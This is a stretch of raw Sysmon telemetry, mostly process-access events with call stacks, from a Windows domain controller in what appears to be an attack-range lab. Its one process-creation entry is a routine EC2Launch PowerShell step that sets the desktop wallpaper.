12:02:41.541{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=209FB22AEB02414DB3C7F5028792CD2E,SHA256=CE41A2E6F479375B33824687AD8F5C256B821C143296A20682EC776C24A7C7E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a918a|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\shell32.dll+a90f4|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a90d6|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+a90d6|C:\Windows\System32\shell32.dll+db0a2|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\shell32.dll+4b1fa|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+4b1e8|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:41.183{266CAFBE-64C8-6064-AB00-00000000AE01}50802524C:\Windows\system32\rundll32.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\shell32.dll+4b1e8|C:\Windows\System32\shell32.dll+db374|C:\Windows\System32\shell32.dll+dafc8|C:\Windows\system32\AppXDeploymentExtensions.OneCore.dll+5d1fe|C:\Windows\system32\rundll32.exe+3b0c|C:\Windows\system32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.679{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.679{266CAFBE-64E2-6064-BA00-00000000AE01}68126816C:\Windows\system32\cmd.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.676{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper -Initial" 
C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" " 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.663{266CAFBE-64C5-6064-A500-00000000AE01}43565504C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.647{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565592C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.647{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.632{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:42.632{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.632{266CAFBE-64E2-6064-BB00-00000000AE01}68206840C:\Windows\system32\conhost.exe{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.616{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64E2-6064-BB00-00000000AE01}6820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
